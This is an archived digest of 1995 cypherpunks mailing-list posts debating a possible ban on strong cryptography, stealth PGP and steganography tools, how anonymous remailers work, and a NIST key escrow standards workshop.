From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Sun, 17 Sep 95 12:28:43 PDT
Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.)
Message-ID: <20045.9509171928@exe.dcs.exeter.ac.uk>

Black Unicorn writes:
> 
> 3. Unescrowed crypto banned, with advanced stego, panic passwords,
> stealth PGP, incorporated remailers all across international borders
> making offenders impossible to identify or catch.
> 
> [...] I believe the goal is to propagate crypto far enough to at
> least have a salient "underground" participants.
> 
> Some months ago I called for advanced stego and stealth PGP as well
> as larger keys in the event we all had to go "into the crypto
> closet" for a time.
> 
> I call for them again.

Guess you're saying that a future underground cypherpunk group is going to need tools to continue if the US plummets into cryptographic darkness. And you'd like to see these tools available now, as it will be difficult to distribute, and set up if the big ban is already on us. A pre-emptive safety precaution in the event that it happens.

So what threat model do you envisage tools being needed to withstand?

A couple of the things you list are realisable with little effort, one is a PGP with large keys, I am using a doctored to go to 16k keys (I did this to amuse myself with getting timings for how long encrypt / decrypt & keygen take for varying key sizes). The patch is small, and easy to figure out, just a couple of #ifdefs, various people posted their patches to do this to alt.security.pgp some time ago.
I think there was at least one patched version of PGP distributed (unofficially of course - PGP's largest allowed key size being 2048 bits), though I don't have any URLs for such a beast. Part of the problem is people seem to frown on distributing PGPs with larger keys, or alternate versions of PGP, due to version control issues, and such. Technically easy to do tho.

Adding stealth features to PGP, or even as standalone, aren't hard either. I've been trying to add Hal's improved stealth algorithm to Henry Hastur's stealth program. It's basically finished, except for the problem that I am unsure about the security of the construct:

    x' = f(MD5(x)) * N + x

    where 0 < x < N and 0 < x' < M
    where M is a power of 2, and M > 2^64 * N
    and f is just a scaling function

If that is secure I'd be happy to release an updated version of stealth, but without assurance, it is necessary to include random numbers, and the best way I see to achieve that is to build it in to PGP, and use PGP's ran no utils directly. If you're talking about a different version of PGP, perhaps this wouldn't be a big deal anyway.

So that's big key PGP, and stealth PGP. I'm presuming most people figure 128 bit IDEA is suitably unassailable, but RSA keys are a moving target, and less predictable due to improvements in factoring algorithms. Already people are talking about an academic RSA129 like attempt on a 512 bit PGP key.

What are views about creating Yet Another version of PGP? I've read a few discussions of this kind of thing in the past on alt.security.pgp, and most people were against it. But I think some useful things could come out of it. The other problem is working with pgp2.x when there is a version 3.0 being worked on, not sure what stage 3.0 is at, any coding.. perhaps if a stealth capable pgp2.x was worked on, and a few features demonstrated, the 3.0 folks would be willing to take a look at it to evaluate the features for possible version 3.0 inclusion. Just don't want to go do a of work, and then get a polite cease and desist from those with interests in managing the version control of PGP.

Good stego tools are the other main problem. My understanding is that all of the stego programs to date do it by just ripping out the LSB of an audio or graphic image, and replacing that with the bits from a message with a stealthed message. Sending masses of pictures around is kind of suspicious tho, I mean several a day, each freshly scanned from what? I guess if video conferencing gets here, it would be fun to add the stego into that noisy stream, same for internet phone. Text stego, with bits hidden in the entropy of english text, seems a harder objective, but a useful one.

I'm presuming that plausible deniability, and facilities for anonymity are essentials. How does one go about doing that? Using newsgroups to carry on a two level communication might be a good way of maintaining plausible deniability. Either a stego interface to remailers in other countries, so that the stego gateway to remailers scans its newspool, decrypts messages addressed to it, and forwards that off to the anon remailers. The outcome could be a further text or graphics stegoed message for posting to a suitably high noise news group. The recipient is also scanning his news spool for stego messages addressed to him. Sounds feasible. Perhaps a proof of concept would be easy to knock up, if a place holder is inserted where the 'good text stego' program should go. There was a 'texto' posted a while ago which did something suitable.

Adam

From blancw at accessone.com Sun Sep 17 12:44:03 1995
From: blancw at accessone.com (blancw at accessone.com)
Date: Sun, 17 Sep 95 12:44:03 PDT
Subject: "Hackers"-- brief review and anecdote...
Message-ID: <9509171945.AA26239@accessone.com>

From: Ray Arachelian

And that's where we, the cypherpunks come in, by advocating strong cryptographic protocols and tools, we can keep every machine safe from intrusion; it's not just Uncle Sam's evil minions that should have total privacy; normal citizens need privacy too - the spooks shouldn't be the only ones with it. :-) This message has been brought to you by the Cypherpunks. Use only Cypherpunks brand software ;-D
................................................

Cypherpunk crypto in every computer in every home.

..
Blanc

From gnu at toad.com Sun Sep 17 13:20:14 1995
From: gnu at toad.com (John Gilmore)
Date: Sun, 17 Sep 95 13:20:14 PDT
Subject: Intellectual Property and Crypto collision
Message-ID: <9509172020.AA23349@toad.com>

> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
> A presidential task force has recommended that electronic transmission of
> books, magazine articles and software should be classified as copies
> subject to existing copyright laws. The task force also recommended that
> it should be illegal to make or distribute products aimed at decoding
> encrypted software without the consent of the copyright owner.

Would this make it illegal to produce tools for decrypting key-escrowed software? :-)

John

From shields at tembel.org Sun Sep 17 13:28:04 1995
From: shields at tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 13:28:04 PDT
Subject: cypherpunks as a newsgroup
Message-ID: 

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL: 

From hallam at w3.org Sun Sep 17 13:39:22 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sun, 17 Sep 95 13:39:22 PDT
Subject: Commercial Mixmaster
In-Reply-To: <199509170513.AA06296@ideath.goldenbear.com>
Message-ID: <9509172034.AA07230@zorch.w3.org>

Adam Shostack writes:
> Its worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK). People use it because they trust Julf, or
> trust people who trust Julf.

I seem to remember that Julf took over Stephie's code from Wizvax which used to post into the alt.sex.bondage group. I suspect he has modified it since but I don't think that there is much to it. Even if Julf released some code there would be no way of knowing that it was the code he runs except by compromising the anonymity of the service itself.

In any case it is clear that the confidentiality of the service relies entirely on the trustworthiness of Julf and the security of the lines into Julf's server. I accept the former but can't believe for a moment that every spook and his aunt doesn't have a tap on the latter.

How does the cypherpunks remailer work? Does PGP encrypt the signature of a message so that the identity of the sender is unknown? Or is it simply PEM style encryption so that the DN of the sender is in the clear :-(

Phill

From bdavis at thepoint.net Sun Sep 17 13:53:27 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Sun, 17 Sep 95 13:53:27 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To: <199509170217.WAA10568@clark.net>
Message-ID: 

On Sat, 16 Sep 1995, Ray Cromwell wrote:

> 
> > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > > >is curiosity."
> > 
> > It may not be a crime, but it's not nice to steal a title.
> 
> I think there's a high probability of someone independently inventing
> the title "hackers" for this movie rather than steal it. It's not
> very original. Besides, the content of your book has very little
> to do with this movie. The movie would be more appropriately
> titled "crackers" or "phreakers"
> 
> -Ray
> 

Or maybe Bruce Sterling should object.
From stewarts at ix.netcom.com Sun Sep 17 14:22:45 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 17 Sep 95 14:22:45 PDT
Subject: CYPHERPUNK considered harmful
Message-ID: <199509172122.OAA00733@ix3.ix.netcom.com>

>I haven't seen anyone advocating the "watering down" of any so-called
>"teachings" to "hide" any "true potential". The only thing that people
>have mentioned is that some of the less clueful out there have a knee
>jerk response to the name "cypherpunk". That's all.

At least early on, back when we were getting our 15 kilobytes of fame on the front covers of WiReD and the NYT magazine section, the name appeared to be useful for getting attention; Tim and Eric were getting occasional quotes in the mundane press, as was John Gilmore who has had longer-term relationships with some of the press through his other activities. Maybe the NYT isn't the paragon of respectability that it once was.....

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From tcmay at got.net Sun Sep 17 14:40:32 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 17 Sep 95 14:40:32 PDT
Subject: "Attachments"
Message-ID: 

Why do people keep sending "attachments"?

This was just a text article, and not an application (program), so why was it included as an "attachment"?

At 8:27 PM 9/17/95, Michael Shields wrote:
>Attachment converted: Macintosh HD:cypherpunks as a newsgroup (????/----)
>(00005C4E)

The message was, as Microsoft Word 6.0 saw it:

-----BEGIN PGP SIGNED MESSAGE-----

The general opinion seems to be that the netnews format is very convenient, though we should keep the list; but that entering Usenet or Altnet would lower the S/N.

Why not, then, start a new hierarchy? Why not gate cypherpunks not to alt.cypherpunks or comp.security.cypherpunks, but to crypto.cypherpunks? We could feed it freely between us and set up NNTP servers which are open for just crypto.*. c.c would be the only crypto.* group for now, but it would also be easy to add more -- say, for the "respectable" splinter group, or for protocol WGs.

We'd get the convenience of netnews without the high profile.

I'm willing to run the gateway on news.tembel.org and feed other sites, if people think crypto.cypherpunks is a good idea. Opinions?
- -- 
Shields.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFyEm+yjYMb1RsVfAQF1YQQAneg8c6yUKJUUybqepl52yqyS53OGrpLq
YfdrMYaIxMWdWKNpMAAus/g8WjWMwYrrB4p+8/WLMm4HsUEHO2ouNzbraiyMRwaB
NEhf0v/91h9jGniZIX5uQyqSdM/VC5YupWV0cITqKte9iLZR77C5hVqXBiLhRcwG
YL8GwDP5tYw=
=roIF
-----END PGP SIGNATURE-----

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Sun Sep 17 15:01:34 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 17 Sep 95 15:01:34 PDT
Subject: Commercial Mixmaster
Message-ID: 

At 8:34 PM 9/17/95, hallam at w3.org wrote:
>I seem to remember that Julf took over Stephie's code from Wizvax which
>used to
>post into the alt.sex.bondage group. I suspect he has modified it since but I
>don't think that there is much to it.

Actually, it was the code of Karl Kleinpaste that Julf took over...I seem to recall Julf saying this in an article. In any case, this is what Karl claimed last year:

"There are 3 sites out there which have my software: anon.penet.fi, tygra, and uiuc.edu. I have philosophical disagreement with the "universal reach" policy of anon.penet.fi (whose code is now a long-detached strain from the original software I gave Julf -- indeed, by now it may be a complete rewrite, I simply don't know); ....Very bluntly, having tried to run anon servers twice, and having had both go down due to actual legal difficulties, I don't trust people with them any more." [Karl_Kleinpaste at cs.cmu.edu, alt.privacy.anon-server, 1994-08-29]

>How does the cypherpunks remailer work? Does PGP encrypt the signature of a
>message so that the identity of the sender is unknown? Or is it simply PEM
>style
>encryption so that the DN of the sender is in the clear :-(

Assuming this is a serious question and not a troll, cypherpunks remailers (at least the ones I have used) completely encapsulate a message. No stuff "dangles outside" the remailed part. When PGP encryption is used, nothing is outside the block.

If Alice sends something to Bob's Remailer, Bob decrypts the message and may or may not find further encrypted blocks inside. Envelopes within envelopes. I can't imagine it being done any other way.

(I'm not counting the remailers possibly signing the sent messages, as a way of protecting against tampering, but this reveals nothing about the senders.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From unicorn at polaris.mindport.net Sun Sep 17 15:39:01 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sun, 17 Sep 95 15:39:01 PDT
Subject: CYPHERPUNK considered harmful.
In-Reply-To: <199509162015.AA03916@ideath.goldenbear.com>
Message-ID: 

On Sat, 16 Sep 1995, Greg Broiles wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn writes:
> > Some months ago I called for advanced stego and stealth PGP as well as
> > larger keys in the event we all had to go "into the crypto closet" for a
> > time.
> 
> > I call for them again.
> 
> I know of three ways to get software:
> 
> 1. Write it yourself.

I've admitted before I program as well as a carp. (No, not Mr. Carp)

> 2. Pay someone else to write it.

I don't think that e.g., a stealth PGP would demand much of a fee, or that such a fee would make many of the people involved in the various intellectual rights of the program happy.

I might add that I don't want the software for myself, I want it for the effect it will have on potential legislation/enforcement. If some other 'punks want to get together and fund such projects, I will participate. However, putting the burden of financing this venture (which will have no immediate economic return, as I will support no venture which does not result in fully public software) entirely on my shoulders just because I happen to believe it will soon be necessary to maintain any strong crypto ability, is unrealistic, and I believe you know it.

> 3. Find software someone else wrote that meets your needs.

I'm working on 3, I don't believe it exists.

> If (3) isn't working, perhaps you should try (1) or (2).
> 
> (I've been "calling for" a big house with a hot tub for years now.
> Still no progress. I'll let you know if it works out.)

Cute, but that's about all.

> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
> DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
> WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
> Dj2FOIfxiFY=
> =5DwJ
> -----END PGP SIGNATURE-----
> 

---
"In fact, had Bancroft not existed,      potestas scientiae in usu est
 Franklin might have had to invent him." in nihilum nil posse reverti
 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From shields at tembel.org Sun Sep 17 15:40:13 1995
From: shields at tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 15:40:13 PDT
Subject: "Attachments"
In-Reply-To: 
Message-ID: 

> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It wasn't. It was a monopart MIME message of type application/pgp. Check your mailer config.
-- 
Shields.

From unicorn at polaris.mindport.net Sun Sep 17 15:40:51 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sun, 17 Sep 95 15:40:51 PDT
Subject: WAS_tem (fwd)
In-Reply-To: <9509162012.AA29482@wu1.wl.aecl.ca>
Message-ID: 

On Sat, 16 Sep 1995, S. Keeling wrote:

> Incoming from Rev. Ben:
> > 
> > On Thu, 14 Sep 1995, James A. Donald wrote:
> > 
> > > If you draw a picture using paintbrush of an underage person engaging
> > > in sexual conduct, you are in violation of this proposed legislation.
> > 
> > Doesn't that directly contradict the stated purpose of existing child
> [snip]
> > 
> > Do the lawyers on the list want to pipe up?

The current child pornography laws are entirely misguided and poorly written.

> -- 
> 
> "Remember, obsolescence (Win95) isn't an accident; it's an art form!"
> keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs
> 

---
"In fact, had Bancroft not existed,      potestas scientiae in usu est
 Franklin might have had to invent him." in nihilum nil posse reverti
 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From futplex at pseudonym.com Sun Sep 17 15:46:06 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 17 Sep 95 15:46:06 PDT
Subject: "Attachments"
In-Reply-To: 
Message-ID: <9509172245.AA20150@cs.umass.edu>

Tim May the Luddite ;) writes:
[in response to Michael Shields' application/pgp message]
> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It's useful for those of us with MIME-enabled mailers, appropriately configured -- PGP is automatically launched to check the signature. It's not useful for others on the list, AFAIK.

Pretty please, let's not have another MIME war; I think we drove Amanda Walker away permanently with the last one. Followups directed somewhere other than cypherpunks at toad.com.

-Futplex

From tedwards at Glue.umd.edu Sun Sep 17 15:55:14 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Sun, 17 Sep 95 15:55:14 PDT
Subject: Friday's NIST Key Escrow FIPS Workshop
Message-ID: 

I went to the NIST "Developing Key Escrow Encryption Standards Workshop" held in Gaithersburg, MD on Sept. 15, 1995. It turns out I know the guy who was running the conference so I knew I couldn't miss it...and I knew I had to wear my Cypherpunks t-shirt to show the flag (and it stood out, as there were few without suits there).

I got to meet Dorothy Denning for the first time. I was mentioning how government key-escrow doesn't sound too bad to some in the libertarian/cypherpunk world, say for instance to ensure FOIA requests are not encrypted away. She said that would never be a problem, just getting the government to give you FOIA documents in the first place is the problem.

In a nutshell, this was a conference to begin work on a FIPS for software key encryption escrow.
Industry people there felt that a FIPS would be a great way to standardize key escrow for data recovery. However, except for one guy at IBM who said they tap employees' phones a lot, most industry people felt that it was not needed for tapping their real-time communications.

There was a lot of talk from government people about the need for Law Enforcement to get access to encrypted real-time communication between government employees. This, to say the least, squicked many attendees, and there seemed to be much tension between the sides on that issue.

I asked a couple of industry people and privacy advocates the question "Am I just paranoid, or is this FIPS a trial balloon for mandated civilian key escrow?" I got many "yes" answers. I also heard the occasional "this sounds like son-of-clipper" comments in the breakout groups.

One noteworthy point is that RSA sent in a position paper to try to get the Digital Signature Standard replaced by RSA signatures for inclusion in key escrow FIPS due to its "virtual non-availability in commercial products," and noted that the US Govt. has free use of RSA sigs.

Another noteworthy point is that NIST made clear that the key escrow FIPS should _not_ involve SECRET algorithms.

The Workshop consisted of a discussion of goals and objectives by Ray Kammer (Deputy Director, NIST) and some initial thoughts on standards development by Miles Smid (NIST). Here is the gist of the overhead slides:

The Goals of the workshop were based on the August 17 announcement by the Administration to allow for exportability of 64-bit software key escrow encryption, plans to allow Federal agencies to use Escrowed Encryption Standards compliant hardware devices for data communications, and the development of a FIPS for key escrow, implementable in software. This escrow FIPS would be used by Federal agencies in conjunction with FIPS-approved encryption techniques. This workshop was held to help begin the FIPS development.

The workshop goals included 1) Providing input to the govt. on drafting a software key escrow encryption standard; 2) Helping govt. to identify additional policy and technical issues that need to be addressed and 3) providing the govt. with thoughts on drafting and follow-up.

The FIPS process involves developing the draft FIPS, a 90 day comment period, then addressing comments, and then it goes to the Secretary of Commerce for signature, and becomes effective six months after the signature.

The purpose of the New Escrow FIPS is to foster a wider use of escrow technology...this means: no requirement for SECRET algorithms, software and hardware implementations, and exportability. It also will provide a government validation of escrow systems meeting the standard...theoretically allowing for security, integrity, and availability.

Threats examined included compromise (unauthorized disclosure of keys and data recovery), and denial of service (modification or loss of keys, use of bogus recovery fields, and improper system operation).

The FIPS will provide common formats and procedures which will facilitate data recovery and lower cost. Applicability of the FIPS will include the US Govt. and contractors. Applications include both stored and transmitted data. Encryption algorithms must be FIPS approved. And finally desirable features include: auditing, configuration control, backup capability, and efficiency.

The questions asked to the breakout groups included:

1) Is a standard interface for the release of keys desirable?
2) What documentation is required?
3) How will operational procedures be developed?
4) How will conformance be validated?
5) Will security be evaluated? If so, under what criteria and by whom?
6) How will configuration control be maintained?
7) Are new FIPS-approved algorithms necessary?
8) Should escrowing be built into the Public Key Infrastructure?
9) Is a standard escrow system identification field needed?
10) Is split knowledge required?
11) Do systems which permit data to be encrypted for both storage and transmission need to provide for both kinds of escrow?
12) Does the government require special features (2-hour access, continuous real-time decryption, etc.)?

From perry at piermont.com Sun Sep 17 16:21:04 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 17 Sep 95 16:21:04 PDT
Subject: CYPHERPUNK considered harmful.
In-Reply-To: 
Message-ID: <199509172320.TAA28220@frankenstein.piermont.com>

Black Unicorn writes:
> > > Some months ago I called for advanced stego and stealth PGP as well as
> > > larger keys in the event we all had to go "into the crypto closet" for a
> > > time.
> 
> > > I call for them again.

> On Sat, 16 Sep 1995, Greg Broiles wrote:
> > (I've been "calling for" a big house with a hot tub for years now.
> > Still no progress. I'll let you know if it works out.)

Black Unicorn writes:
> Cute, but that's about all.

I think the problem is that those of us in a position to build them don't really believe that they will solve the problem and thus are spending our time on other matters.

Perry

From unicorn at polaris.mindport.net Sun Sep 17 16:23:21 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sun, 17 Sep 95 16:23:21 PDT
Subject: CYPHERPUNK considered harmful
In-Reply-To: <199509171657.MAA26446@panix.com>
Message-ID: 

On Sun, 17 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn wrote:
> > On Fri, 15 Sep 1995, David C. Lambert wrote:
> > 
> > > BTW, I'm not for changing the name of the list, but I do see the logic
> > > in a more establishment-friendly name to use when lobbying the public.
> > 
> > Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which
> > hide their true (Ohhh! Scary!) potential in an effort to make them commonly
> > acceptable to joe sixpack.
> 
> I believe you misstate the point that people are trying to make.
> > I haven't seen anyone advocating the "watering down" of any so-called > "teachings" to "hide" any "true potential". The only thing that people > have mentioned is that some of the less clueful out there have a knee > jerk response to the name "cypherpunk". That's all. I don't believe you can have one without the other. Tell me someone who is sensitive enough to be offended by the term "cypherpunk" won't be alarmed at concepts like crypto-anarchy. > > > Can't we all see what road this leads down? > > No. Please enlighten us. > When you begin compromising to meet the public sentiment you end up aiming for the middle. "He who builds on the people builds on mud." I believe this especially true in the United States. The general population has no tolerance/time/interest in the deeper issues involved here, and are much more apt to bow to the "law and order" arguments made by the various political entities here. These are emotional arguments to which Joe Sixpack is particularly open. Enter the four horsemen. I believe working to recruit "the people" and lobby "the leaders" to embrace the ramification of free and strong crypto is a losing game. My money in information futures is going into "yes" certificates on the question of "Unescrowed Strong Crypto Banned in U.S. by 2000." > > At the risk of politicizing the issue, I wouldn't be the first to call this > > "left-speak" or "term-sanitizing." > > And this matters because...? > The fact that you need this question answered does more to rebuke your position than I ever could. > > Really the core issue is that the citizens of their respective nations > > need to either: > > > > 1> See cryptography for the important individual rights issue that it > > is and latch on to the basic desire for free and unmonitored commerce and > > exchange without censorship or observation. 
> > > > or > > 2> Decide that they are not interested in the issues because these > > issues are too radical, or simply because their own political ideas > > fall left (or statist) of this spectrum. > > What exactly is it that you feel "the citizens of their respective > nations" are doing right now, if not this? Be real. What percentage of [insert nation here]'s citizens would be able to discuss strong encryption with anything more than a comic book understanding? i.e., the answer to your question is "mostly nothing." > > in the end I > > don't care if every joe sixpack on the planet uses real crypto, just so > > long as those I am to conduct commerce (of data or goods) with do. > > If this is the case, then I'm at a loss to understand how you fail to see > the merit in a "term-sanitizing", as you put it, in order to make the use > of strong crypto desired and required by Joe Sixpack. Your error is in assuming Joe Sixpack desires or thinks he requires strong crypto. > How do you expect > the legality of strong crypto to survive unless Joe and his friends exert > political pressure to keep it alive? I don't expect its legality to survive in the United States, nor do I expect it to survive despite "political pressure" (the nature of which you conveniently do not identify) and finally, I don't expect Joe Sixpack and his friends to exert any (undefined) political pressure- or care. If people want to try and organize a crypto awareness program, fine. If people want to try and organize a crypto propaganda program, count me out. If you don't understand the difference, you need to study history and political science. If Joe Sixpack can't deal with the core, unsanitized ramifications of strong crypto, Joe Sixpack isn't ready to have strong crypto. This is, in my view, realism, and intellectual evolution in action. 
If strong crypto is the advantage I suspect it will be, then those nations which use it will endow its citizens with those significant advantages, hopefully to the disadvantage of the banning nations. With any luck, this will result in the eventual lack of world/market influence of crypto-ignorant Joe Sixpacks. This in my view is "a good thing." I would like the United States to be pro-crypto, but I'm not sure I give the country and its current political system as a whole that much credit. > Isn't it obvious that unless this > happens, that strong (unescrowed) crypto is on the path to being outlawed > (at least in the US, and several other countries)? > > > The final judgement will be in the advantage of velocity and security of > > transactions and the wealth that this "allocates" to those wise enough to > > adopt crypto exchange systems. Evolution in action. If this makes me > > elitist, so be it. > > Elitist or not, this is beside the point. No, it is exactly the point. > People are bringing up political > and rhetorical concerns because they feel that political and persuasive > methods are required *right now* in order to preserve the *legality* of > strong crypto. And I believe them a waste of time because I feel that political and persuasive methods are useless *right now* or in the *foreseeable future*. The only thing that will stop this legislation will be a sudden awakening of the American People to freedom of speech in the face of an offered and vague promise of "security." (Read: Good Luck) The FBI is screaming that strong crypto is nasty stuff to the Executive. Certainly the intelligence agencies are doing the same. The Executive is going to support if not outright push through a key forfeiture bill, and about all I can see standing in the way will be cost- which in this bill is going to be small. 
> I only care about whether Joe Sixpack wants strong crypto > because if I can't persuade him that he does, he won't help me keep it > legal in my country of residence. So if you are so in touch with Joe Sixpack, what does he think? Do you have some evidence to suggest that there is any widespread awareness of the issues among Joe and Jane? Surveys? Studies? Anything? Go out on the street and ask 10 random people. Hell, ask 10 intellectuals not in the computer science field. I think your level of disillusion will approach mine, and if not, then I do not give your powers of observation much credit. > Once its legality seems safe(r) from > attack, he can go on using rot13 for all I care. I think you have a long wait. Part of the entire issue here is securing your own privacy rather than letting the government do it for you. By waiting for someone to TELL YOU that you are now ALLOWED to secure your own privacy, why are you any better than he who doesn't use strong crypto? Instead you should, while perhaps allocating some effort to political concerns, be working to propagate crypto systems which are untraceable, do not bear the recipient's key identifier in each message, and are otherwise able to endure a crypto "Dark Age" which I see right around the corner here. In other words: Secure it yourself. Privacy comes to you only if you secure it yourself. If you believe that political action is the way to do this, be my guest- I happen to think you are wasting your time. Time will judge the winner of this debate in any event. I hope I am wrong, I expect I am not. > > David C. Lambert > dcl at panix.com > (finger for PGP public key) > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 [...] > -----END PGP SIGNATURE----- > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." 
in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jya at pipeline.com Sun Sep 17 16:25:53 1995 From: jya at pipeline.com (John Young) Date: Sun, 17 Sep 95 16:25:53 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <199509172325.TAA22254@pipe2.nyc.pipeline.com> Responding to msg by unicorn at polaris.mindport.net (Black Unicorn) on Sun, 17 Sep 6:39 PM >If some other 'punks want to get together and fund such >projects, I will participate. However, putting the >burden of financing this venture (which will have no >immediate economic return, as I will support no venture >which does not result in fully public software) What are the prospects of privacy-enhancing programming funded by contributors for non-commercial, non-governmental, "fully public software?" I would tithe, modestly but durably, to such work if I believed the promise. They call me Ishmael Sixpack. John Gilmore's (and others'?) underwriting toad is impressive. Along with the voluntary (?) effort of Hugh Daniels (and others, I don't know how toad survives). What else might be done cypherpunk-wise if material resources were available? And under what conditions and arrangements? The discussion of Mixmaster commercialization is instructive. And Julf's and the other remailers' survivability and longevity in the face of attacks. How could the contributions be made without contaminating the product? No joke. Or, are only individually initiated and self-funded programs trustworthy, when all is said and done? And no planned program as rewarding as the eclectic irregulated. And bartering and bickering and rending and mending the only reputable method of exchange of the tumultuous souk. From pcw at access.digex.net Sun Sep 17 16:30:31 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 17 Sep 95 16:30:31 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: >>I saw "Hackers" yesterday. 
It's not bad and its political sensibility is >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime >>is curiosity." > >It may not be a crime, but it's not nice to steal a title. Well, what do you think of my latest predicament? My first book, "Agents Unleashed" will be retitled "Agents At Large" because SAMS, a division of Viacom, considers any title ending with the word "unleashed" to be an infringement of their trade dress. They came up with enough legal mumbo-jumbo about trademark to scare my publisher into changing it. -Peter From unicorn at polaris.mindport.net Sun Sep 17 16:37:02 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 16:37:02 PDT Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.) In-Reply-To: <20045.9509171928@exe.dcs.exeter.ac.uk> Message-ID: --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information On Sun, 17 Sep 1995 aba at atlas.ex.ac.uk wrote: > > Black Unicorn writes: > > > > 3. Unescrowed crypto banned, with advanced stego, panic passwords, > > stealth PGP, incorporated remailers all across international borders > > making offenders impossible to identify or catch. > > > > [...] I believe the goal is to propagate crypto far enough to at > > least have a salient "underground" participants. > > > > Some months ago I called for advanced stego and stealth PGP as well > > as larger keys in the event we all had to go "into the crypto > > closet" for a time. > > > > I call for them again. > > Guess you're saying that a future underground cypherpunk group is > going to need tools to continue if the US plummets into cryptographic > darkness. And you'd like to see these tools available now, as it will > be difficult to distribute, and set up if the big ban is already on > us. 
A pre-emptive safety precaution in the event that it happens. Precisely. Thank you. > > So what threat model do you envisage tools being needed to withstand? > Traffic analysis, jurisdiction, detection of encrypted data in stego'd files. I believe the basic problem will be one of avoiding detection and the ability to piggyback harmless looking files on "approved" encryption. In the event your encrypted message were detected, it would be nice if it didn't announce its intended destination via a public key header. I also believe that excessively large keys should be incorporated (2048/4096 bit RSA and 256 bit IDEA like encryption perhaps) to extend the likely useful life of cyphers which will be difficult to distribute later. I also would like to see applications which permit the user to select from among a few types of encryption, in the event one is found to be broken. > A couple of the things you list are realisable with little effort, one > is a PGP with large keys, I am using a doctored to go to 16k keys [description of availability] > Adding stealth features to PGP, or even as standalone, aren't hard > either. I've been trying to add Hal's improved stealth algorithm to > Henry Hastur's stealth program. It's basically finished, except for > the problem that I am unsure about the security of the construct: Excellent! > So that's big key PGP, and stealth PGP. I'm presuming most people > figure 128 bit IDEA is suitably unassailable, I'm pretty confident in it, but I would like to see some others about. > What are views about creating Yet Another version of PGP. I've read a > few discussions of this kind of thing in the past on alt.security.pgp, > and most people were against it. But I think some useful things could > come out of it. I think one of the big hold ups is the wait for PGP 3.0 > > The other problem is working with pgp2.x when there is a version 3.0 > being worked on, not sure what stage 3.0 is at, any coding.. 
